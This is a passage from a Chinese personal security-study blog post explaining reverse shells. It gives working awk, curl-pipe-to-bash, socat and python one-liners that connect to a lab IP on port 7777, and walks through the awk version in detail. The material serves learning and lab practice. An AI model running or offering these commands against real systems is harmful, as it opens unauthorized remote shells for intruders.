<h2 id="awk反弹"><a class="anchor" href="#awk反弹">#</a> awk反弹</h2>
<p>awk原本是一个用来处理文件的命令：</p>
<pre class="shiki shiki-themes vitesse-light vitesse-dark" style="background-color:#ffffff;--shiki-dark-bg:#121212;color:#393a34;--shiki-dark:#dbd7caee" tabindex="0"><code class="language-text"><span class="line"><span>awk '动作' 文件名</span></span></code></pre>
<p><img loading="lazy" src="/2026/03/12/%E4%BD%8E%E7%89%88%E6%9C%ACphp%E4%B8%8B%E4%BF%A1%E6%81%AF%E6%B3%84%E9%9C%B2%E7%9A%84CVE%E6%BC%8F%E6%B4%9E/15.png" class=""></p>
<p>此命令将逐行打印flag.txt的内容，其中$0表示整行内容。</p>
<p><img loading="lazy" src="/2026/03/12/%E4%BD%8E%E7%89%88%E6%9C%ACphp%E4%B8%8B%E4%BF%A1%E6%81%AF%E6%B3%84%E9%9C%B2%E7%9A%84CVE%E6%BC%8F%E6%B4%9E/16.png" class=""></p>
<p>这里的$n表示第n个字段</p>
<p>接下来了解了解awk反弹shell：</p>
<pre class="shiki shiki-themes vitesse-light vitesse-dark" style="background-color:#ffffff;--shiki-dark-bg:#121212;color:#393a34;--shiki-dark:#dbd7caee" tabindex="0"><code class="language-text"><span class="line"><span>awk 'BEGIN&#123;s="/inet/tcp/0/192.168.152.128/7777";for(;s|&#x26;getline c;close(c))while(c|getline)print|&#x26;s;close(s)&#125;'</span></span></code></pre>
<p><code>BEGIN&#123;&#125;</code>：正常来说awk是等有文件输入了才执行，不过加载BEGIN块之后表示程序一启动就执行括号内的代码</p>
<p><code>s=&quot;/inet/tcp/0/192.168.152.128/7777&quot;</code>：与<code>/dev/tcp</code>类似，<code>awk</code> 内部同样硬编码了一个特殊的虚拟路径解析器：<code>/inet/网络协议/本地端口/目标IP/目标端口</code>，在给s赋值的同时，awk建立了一个通向kali的TCP握手，0表示本地端口随机</p>
<p><code>for(;s|&amp;getline c;close(c))</code>：</p>
<p>​      <code>|&amp;</code>：双向管道符，awk独有，它把套接字s修改为可读写的通道</p>
<p>​      <code>s|&amp;getline c</code>：如果从kali中传来了命令，就把他读取下来存进变量c中</p>
<p>​      <code>close(c)</code>：每次执行完命令之后清理执行环境准备执行下一条命令</p>
<p><code>while(c|getline) print|&amp;s</code>：当c获得命令，awk会将c里的字符串交给操作系统执行并且把执行出来的结果一行行读取出来，<code>print|&amp;s</code>表示把读取到的结果顺着双向管道赋值给<code>s</code></p>
<p><img loading="lazy" src="/2026/03/12/%E4%BD%8E%E7%89%88%E6%9C%ACphp%E4%B8%8B%E4%BF%A1%E6%81%AF%E6%B3%84%E9%9C%B2%E7%9A%84CVE%E6%BC%8F%E6%B4%9E/17.png" class=""></p>
<h2 id="curl反弹"><a class="anchor" href="#curl反弹">#</a> curl反弹</h2>
<p>我们可以将一个shell反弹的payload放在靶机可以执行curl的地方，然后利用管道符和sh</p>
<pre class="shiki shiki-themes vitesse-light vitesse-dark" style="background-color:#ffffff;--shiki-dark-bg:#121212;color:#393a34;--shiki-dark:#dbd7caee" tabindex="0"><code class="language-text"><span class="line"><span>curl 192.168.152.128/bash.html|bash</span></span></code></pre>
<p><img loading="lazy" src="/2026/03/12/%E4%BD%8E%E7%89%88%E6%9C%ACphp%E4%B8%8B%E4%BF%A1%E6%81%AF%E6%B3%84%E9%9C%B2%E7%9A%84CVE%E6%BC%8F%E6%B4%9E/19.png" class=""></p>
<h2 id="socat反弹"><a class="anchor" href="#socat反弹">#</a> socat反弹</h2>
<pre class="shiki shiki-themes vitesse-light vitesse-dark" style="background-color:#ffffff;--shiki-dark-bg:#121212;color:#393a34;--shiki-dark:#dbd7caee" tabindex="0"><code class="language-text"><span class="line"><span>socat exec:'bash -li',pty,stderr,setsid,sigint,sane tcp:192.168.152.128:7777</span></span></code></pre>
<p><img loading="lazy" src="/2026/03/12/%E4%BD%8E%E7%89%88%E6%9C%ACphp%E4%B8%8B%E4%BF%A1%E6%81%AF%E6%B3%84%E9%9C%B2%E7%9A%84CVE%E6%BC%8F%E6%B4%9E/18.png" class=""></p>
<h2 id="python反弹"><a class="anchor" href="#python反弹">#</a> python反弹</h2>
<pre class="shiki shiki-themes vitesse-light vitesse-dark" style="background-color:#ffffff;--shiki-dark-bg:#121212;color:#393a34;--shiki-dark:#dbd7caee" tabindex="0"><code class="language-text"><span class="line"><span>python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("192.168.152.128",7777));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'</span></span></code></pre>
<p>原理其实也和前面的差不多，建立网络连接之后把0,1,2都接上通道</p>
<p><img loading="lazy" src="/2026/03/12/%E4%BD%8E%E7%89%88%E6%9C%ACphp%E4%B8%8B%E4%BF%A1%E6%81%AF%E6%B3%84%E9%9C%B2%E7%9A%84CVE%E6%BC%8F%E6%B4%9E/20.png" class=""></p>
<p>文章参考：<a target="_blank" rel="noopener" href="https://blog.csdn.net/weixin_44288604/article/details/111740527">反弹shell汇总，看我一篇就够了-CSDN博客</a></p>
</div><footer><div class="meta"><span class="item"><span class="icon"><i class="ic i-calendar-check"></i></span><span class="text">更新于 </span><time title="修改时间：2026-06-02 18:31:21" itemprop="dateModified" datetime="2026-06-02T18:31:21+08:00">2026-06-02</time></span></div><div id="copyright"><ul><li class="author"><strong>本文作者：</strong>ZLARYY<i class="ic i-at"><em>@</em></i>欢迎来到ZLARYY的个人博客，或许里面有什么好玩的东西~</li><li class="link"><strong>本文链接：</strong><a href="https://zlaryy.top/2026/03/12/%E4%BD%8E%E7%89%88%E6%9C%ACphp%E4%B8%8B%E4%BF%A1%E6%81%AF%E6%B3%84%E9%9C%B2%E7%9A%84CVE%E6%BC%8F%E6%B4%9E/" title="低版本php下信息泄露的CVE漏洞与反弹shell">https://zlaryy.top/2026/03/12/低版本php下信息泄露的CVE漏洞/</a></li><li class="license"><strong>版权声明：</strong>本站所有文章除特别声明外，均采用 <a target="_blank" rel="noopener" href="https://creativecommons.org/licenses/by-nc-sa/4.0/deed.zh"><i class="ic i-creative-commons"><em>(CC)</em></i>BY-NC-SA</a> 许可协议。转载请注明出处！</li></ul></div></footer></article></div><div class="post-nav"><div class="item left"><a href="/2026/03/10/%E6%96%87%E4%BB%B6%E5%8C%85%E5%90%AB/" rel="prev" itemprop="url" data-background-image="&#x2F;assets&#x2F;picture2.webp" title="文件包含"><span class="type">上一篇</span><h3>文件包含</h3></a></div><div class="item right"><a href="/2026/03/20/Pickle%E5%8F%8D%E5%BA%8F%E5%88%97%E5%8C%96%E4%B8%8EPython%E5%8E%9F%E5%9E%8B%E9%93%BE%E6%B1%A1%E6%9F%93/" rel="next" itemprop="url" data-background-image="&#x2F;assets&#x2F;picture5.webp" title="Pickle反序列化与Python原型链污染"><span class="type">下一篇</span><h3>Pickle反序列化与Python原型链污染</h3></a></div></div><div class="wrap" id="comments"></div></div><div id="sidebar"><div class="inner"><div class="panels"><div class="inner"><div class="contents panel pjax" data-title="文章目录"><ol class="toc"><li class="toc-item toc-level-1"><a class="toc-link" href="#%E4%BD%8E%E7%89%88%E6%9C%ACphp%E4%B8%8B%E4%BF%A1%E6%81%AF%E6%B3%84%E9%9C%B2%E7%9A%84cve%E6%BC%8F%E6%B4%9E"><span class="toc-number">1.</span> <span class="toc-text"> 低版本php下信息泄露的CVE漏洞</span></a></li><li class="toc-item toc-level-1"><a class="toc-link" href="#%E5%8F%8D%E5%BC%B9shell"><span class="toc-number">2.</span> <span class="toc-text"> 反弹shell</span></a><ol class="toc-child"><li class="toc-item toc-level-2"><a class="toc-link" href="#bash%E5%8F%8D%E5%BC%B9"><span class="toc-number">2.1.</span> <span class="toc-text"> bash反弹</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#nc%E5%8F%8D%E5%BC%B9"><span class="toc-number">2.2.</span> <span class="toc-text"> nc反弹</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#php%E5%8F%8D%E5%BC%B9"><span class="toc-number">2.3.</span> <span class="toc-text"> php反弹</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#exec%E5%8F%8D%E5%BC%B9"><span class="toc-number">2.4.</span> <span class="toc-text"> exec反弹</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#perl%E5%8F%8D%E5%BC%B9"><span class="toc-number">2.5.</span> <span class="toc-text"> perl反弹</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#awk%E5%8F%8D%E5%BC%B9"><span class="toc-number">2.6.</span> <span class="toc-text"> awk反弹</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#curl%E5%8F%8D%E5%BC%B9"><span class="toc-number">2.7.</span> <span class="toc-text"> curl反弹</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#socat%E5%8F%8D%E5%BC%B9"><span class="toc-number">2.8.</span> <span class="toc-text"> socat反弹</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#python%E5%8F%8D%E5%BC%B9"><span class="toc-number">2.9.</span> <span class="toc-text"> python反弹</span></a></li></ol></li></ol></div><div class="related panel pjax" data-title="系列文章"></div><div class="overview panel" data-title="站点概览"><div class="author" itemprop="author" itemscope="itemscope" itemtype="http://schema.org/Person"><img class="image" loading="lazy" decoding="async" itemprop="image" alt="ZLARYY" src="/assets/avertar.png"/><p class="name" itemprop="name">ZLARYY</p><div class="description" itemprop="description">Web安全 / CTF / 个人学习笔记</div></div><nav class="state"><div class="item posts"><a href="/archives/"><span class="count">16</span><span class="name">文章</span></a></div></nav><div class="social"><a target="_blank" rel="noopener" href="https://github.com/ZLARYY123" class="item github" title="https:&#x2F;&#x2F;github.com&#x2F;ZLARYY123"><i class="ic i-github"></i></a></div><div class="menu"><li class="item"><a href="/" rel="section"><i class="ic i-home"></i>首页</a></li><li class="item"><a href="/friends/" rel="section"><i class="ic i-heart"></i>友链</a></li><li class="item"><a href="/essay/" rel="section"><i class="ic i-calendar"></i>essay</a></li></div></div></div></div><ul id="quick"><li class="prev pjax"><a href="/2026/03/20/Pickle%E5%8F%8D%E5%BA%8F%E5%88%97%E5%8C%96%E4%B8%8EPython%E5%8E%9F%E5%9E%8B%E9%93%BE%E6%B1%A1%E6%9F%93/" rel="prev" title="上一篇"><i class="ic i-chevron-left"></i></a></li><li class="up"><i class="ic i-arrow-up"></i></li><li class="down"><i class="ic i-arrow-down"></i></li><li class="next pjax"><a href="/2026/03/10/%E6%96%87%E4%BB%B6%E5%8C%85%E5%90%AB/" rel="next" title="下一篇"><i class="ic i-chevron-right"></i></a></li><li class="percent"></li></ul></div></div><div class="dimmer"></div></div><div id="player"></div></main><footer id="footer"><div class="inner"><div class="widgets"><div class="rpost pjax"><h2>随机文章</h2><ul><li class="item"><div class="breadcrumb"></div><span><a href="/2026/02/22/SQL/">SQL</a></span></li><li class="item"><div class="breadcrumb"></div><span><a href="/2026/04/02/flask%20session%E4%BC%AA%E9%80%A0%E4%B8%8Efilter-chain/">flask的session伪造与filter-chain</a></span></li><li class="item"><div class="breadcrumb"></div><span><a href="/2026/05/29/%E5%85%B6%E4%BB%96%E7%B3%BB%E7%BB%9F%E5%BA%93%E7%B1%BB%E5%9E%8B%E4%B8%8B%E7%9A%84SQL%E6%B3%A8%E5%85%A5/">其他系统库类型下的SQL注入</a></span></li><li class="item"><div class="breadcrumb"></div><span><a href="/2026/02/28/RCE/">RCE</a></span></li><li class="item"><div class="breadcrumb"></div><span><a href="/2026/02/12/SSRF/">SSRF</a></span></li><li class="item"><div class="breadcrumb"></div><span><a href="/2026/03/12/%E4%BD%8E%E7%89%88%E6%9C%ACphp%E4%B8%8B%E4%BF%A1%E6%81%AF%E6%B3%84%E9%9C%B2%E7%9A%84CVE%E6%BC%8F%E6%B4%9E/">低版本php下信息泄露的CVE漏洞与反弹shell</a></span></li><li class="item"><div class="breadcrumb"></div><span><a href="/2026/04/23/%E4%BF%A1%E6%81%AF%E6%90%9C%E9%9B%86/">信息搜集</a></span></li><li class="item"><div class="breadcrumb"></div><span><a href="/2026/03/20/Pickle%E5%8F%8D%E5%BA%8F%E5%88%97%E5%8C%96%E4%B8%8EPython%E5%8E%9F%E5%9E%8B%E9%93%BE%E6%B1%A1%E6%9F%93/">Pickle反序列化与Python原型链污染</a></span></li><li class="item"><div class="breadcrumb"></div><span><a href="/2026/05/19/%E5%B8%B8%E8%A7%84%E5%A4%96%E7%BD%91%E6%89%93%E7%82%B9/">常规外网打点</a></span></li><li class="item"><div class="breadcrumb"></div><span><a href="/2026/04/07/XXE/">XXE</a></span></li></ul></div><div class="rpost pjax"><h2>最新评论</h2></div></div><div class="status"><div class="copyright">&copy; 2022 -<span itemprop="copyrightYear">2026</span><span class="with-love"><i class="ic i-sakura rotate"></i></span><span class="author" itemprop="copyrightHolder">ZLARYY @ ZLARYY</span></div><div class="count"><span class="post-meta-item-icon"><i class="ic i-chart-area"></i></span><span title="站点总字数">364k 字</span><span class="post-meta-divider"> | </span><span class="post-meta-item-icon"><i class="ic i-coffee"></i></span><span title="站点阅读时长">5:31</span></div><div class="powered-by">基于 <a target="_blank" rel="noopener" href="https://hexo.io/">Hexo</a> & Theme.<a target="_blank" rel="noopener" href="https://github.com/theme-shoka-x/hexo-theme-shokaX/">ShokaX</a></div></div></div></footer></div><script data-config type="text/javascript">var LOCAL = {
    ispost: true,
    path: `2026/03/12/低版本php下信息泄露的CVE漏洞/`,
    favicon: {
        show: `ZLARYY`,
        hide: `ZLARYY`
    },
    search: {
        placeholder: "文章搜索",
        empty: "关于 「 ${query} 」，什么也没搜到",
        stats: "${time} ms 内找到 ${hits} 条结果"
    },
    nocopy: "false",
    copyright: `复制成功，转载请遵守 <i class="ic i-creative-commons"></i>BY-NC-SA 协议。`,
    copy_tex: false,
    katex: false,
    mermaid: false,
    audio: undefined,
    nocopy: false,
    outime: true,
    template: `<div class="note warning"><p><span class="label warning">文章时效性提示</span><br>这是一篇发布于 {{publish}} 天前，最后一次更新在 {{updated}} 天前的文章，部分信息可能已经发生改变，请注意甄别。</p></div>`,
    quiz: {
        choice: `单选题`,
        multiple: `多选题`,
        true_false: `判断题`,
        essay: `问答题`,
        gap_fill: `填空题`,
        mistake: `错题备注`
    }
};
</script><script src="/js/siteInit.js?v=0.5.4" type="module" fetchpriority="high" defer></script><!-- hexo injector body_end start -->
<script id="post-stats">
(function () {
  var API_NAME = 'ZLARYYPostStats';
  var BOX_SELECTOR = '.post-stats-box';
  var COUNT_LIMIT = 9999;

  if (window[API_NAME] && typeof window[API_NAME].run === 'function') {
    window[API_NAME].run();
    return;
  }

  function isPostPage() {
    return !!(window.LOCAL && window.LOCAL.ispost) || !!document.querySelector('article.post');
  }

  function storageKey(prefix) {
    return prefix + window.location.pathname;
  }

  function getStorageValue(storage, key) {
    try {
      return storage.getItem(key);
    } catch (error) {
      return null;
    }
  }

  function setStorageValue(storage, key, value) {
    try {
      storage.setItem(key, value);
    } catch (error) {}
  }

  function removeStorageValue(storage, key) {
    try {
      storage.removeItem(key);
    } catch (error) {}
  }

  function readCount(key) {
    var raw = getStorageValue(window.localStorage, key);
    var value = raw === null || raw === '' ? 0 : Number(raw);

    if (!Number.isInteger(value) || value < 0 || value > COUNT_LIMIT) {
      value = 0;
      setStorageValue(window.localStorage, key, '0');
    }

    return value;
  }

  function writeCount(key, value) {
    setStorageValue(window.localStorage, key, String(value));
  }

  function bumpViewCount() {
    var countKey = storageKey('zlaryy_view_count_');
    var sessionKey = storageKey('zlaryy_viewed_session_');
    var count = readCount(countKey);

    if (getStorageValue(window.sessionStorage, sessionKey) !== '1') {
      if (count >= COUNT_LIMIT) count = 0;
      count += 1;
      writeCount(countKey, count);
      setStorageValue(window.sessionStorage, sessionKey, '1');
    }

    return count;
  }

  function readLikeCount() {
    return readCount(storageKey('zlaryy_like_count_'));
  }

  function hasLiked() {
    return getStorageValue(window.localStorage, storageKey('zlaryy_liked_')) === '1';
  }

  function saveLikeState(count, liked) {
    writeCount(storageKey('zlaryy_like_count_'), count);
    if (liked) {
      setStorageValue(window.localStorage, storageKey('zlaryy_liked_'), '1');
    } else {
      removeStorageValue(window.localStorage, storageKey('zlaryy_liked_'));
    }
  }

  function clearRewardNodes() {
    document.querySelectorAll('.reward').forEach(function (reward) {
      reward.innerHTML = '';
      reward.classList.add('post-stats-host');
      reward.removeAttribute('style');
      reward.setAttribute('aria-label', 'post stats');
    });
  }

  function findInsertTarget() {
    var reward = document.querySelector('article.post .reward, .reward');
    if (reward) return { parent: reward, before: null };

    var footer = document.querySelector('article.post > footer');
    if (footer && footer.parentNode) return { parent: footer.parentNode, before: footer };

    var article = document.querySelector('article.post');
    if (article) return { parent: article, before: null };

    return null;
  }

  function createStatsBox(viewCount, likeCount, liked) {
    var box = document.createElement('div');
    box.className = 'post-stats-box';
    box.innerHTML = [
      '<button class="post-view-count" type="button" disabled aria-disabled="true">',
      '&#128065; &#x770b;&#x8fc7; <span class="local-view-count">' + viewCount + '</span> &#x6b21;',
      '</button>',
      '<button class="post-like-btn' + (liked ? ' liked' : '') + '" type="button" aria-pressed="' + (liked ? 'true' : 'false') + '">',
      '<span class="post-like-label">' + (liked ? '&#x5df2;&#x70b9;&#x8d5e;' : '&#x70b9;&#x8d5e;') + '</span> ',
      '<span class="local-like-count">' + likeCount + '</span>',
      '</button>'
    ].join('');

    return box;
  }

  function updateLikeButton(button, count, liked) {
    var labelNode = button.querySelector('.post-like-label');
    var countNode = button.querySelector('.local-like-count');

    if (labelNode) labelNode.textContent = liked ? '\u5df2\u70b9\u8d5e' : '\u70b9\u8d5e';
    if (countNode) countNode.textContent = String(count);

    button.classList.toggle('liked', liked);
    button.setAttribute('aria-pressed', liked ? 'true' : 'false');
  }

  function bindLikeButton(box) {
    var button = box.querySelector('.post-like-btn');
    if (!button || button.dataset.bound === 'true') return;

    updateLikeButton(button, readLikeCount(), hasLiked());

    button.dataset.bound = 'true';
    button.addEventListener('click', function () {
      var count = readLikeCount();

      if (hasLiked()) {
        count = Math.max(0, count - 1);
        saveLikeState(count, false);
        updateLikeButton(button, count, false);
        return;
      }

      if (count >= COUNT_LIMIT) count = 0;
      count += 1;
      saveLikeState(count, true);
      updateLikeButton(button, count, true);
    });
  }

  function renderStats() {
    if (!isPostPage()) return;

    clearRewardNodes();

    var viewCount = bumpViewCount();
    var likeCount = readLikeCount();
    var liked = hasLiked();
    var box = document.querySelector(BOX_SELECTOR);

    if (!box) {
      var target = findInsertTarget();
      if (!target) return;

      box = createStatsBox(viewCount, likeCount, liked);
      target.parent.insertBefore(box, target.before);
    }

    var viewNode = box.querySelector('.local-view-count');
    var likeNode = box.querySelector('.local-like-count');
    var likeButton = box.querySelector('.post-like-btn');

    if (viewNode) viewNode.textContent = String(viewCount);
    if (likeNode) likeNode.textContent = String(likeCount);
    if (likeButton) {
      updateLikeButton(likeButton, likeCount, liked);
    }

    bindLikeButton(box);
  }

  function runPostStats() {
    window.setTimeout(renderStats, 0);
  }

  window[API_NAME] = {
    run: runPostStats
  };

  if (document.readyState === 'loading') {
    document.addEventListener('DOMContentLoaded', runPostStats);
  } else {
    runPostStats();
  }

  document.addEventListener('pjax:complete', runPostStats);
})();
</script>
  
<script>
(function () {
  function addBeian() {
    const footerStatus = document.querySelector('#footer .status');
    if (!footerStatus) return;

    if (document.querySelector('.footer-beian')) return;

    const beian = document.createElement('div');
    beian.className = 'footer-beian';
    beian.innerHTML = '<a href="https://beian.miit.gov.cn/" target="_blank" rel="noopener">蜀ICP备2026016552号-1</a>';

    footerStatus.appendChild(beian);
  }

  addBeian();
  document.addEventListener('pjax:complete', addBeian);
})();
</script>
  <script>
(function () {
  function fixText(text) {
    if (!text) return text;
    text = text.replace(/\([`´]?Д[`´]?\)大変だ!/g, "ZLARYY");
    text = text.replace(/大変だ!/g, "ZLARYY");
    return text;
  }

  function replaceText(root) {
    root = root || document.body;
    if (!root) return;

    var walker = document.createTreeWalker(root, NodeFilter.SHOW_TEXT, null, false);
    var node;

    while ((node = walker.nextNode())) {
      var oldText = node.nodeValue;
      var newText = fixText(oldText);
      if (newText !== oldText) node.nodeValue = newText;
    }
  }

  function init() {
    replaceText(document.body);

    var observer = new MutationObserver(function (mutations) {
      mutations.forEach(function (mutation) {
        mutation.addedNodes.forEach(function (node) {
          if (node.nodeType === 1) {
            replaceText(node);
          } else if (node.nodeType === 3) {
            node.nodeValue = fixText(node.nodeValue);
          }
        });
      });
    });

    observer.observe(document.body, {
      childList: true,
      subtree: true
    });
  }

  if (document.readyState === "loading") {
    document.addEventListener("DOMContentLoaded", init);
  } else {
    init();
  }
})();
</script><!-- hexo injector body_end end --></body></html>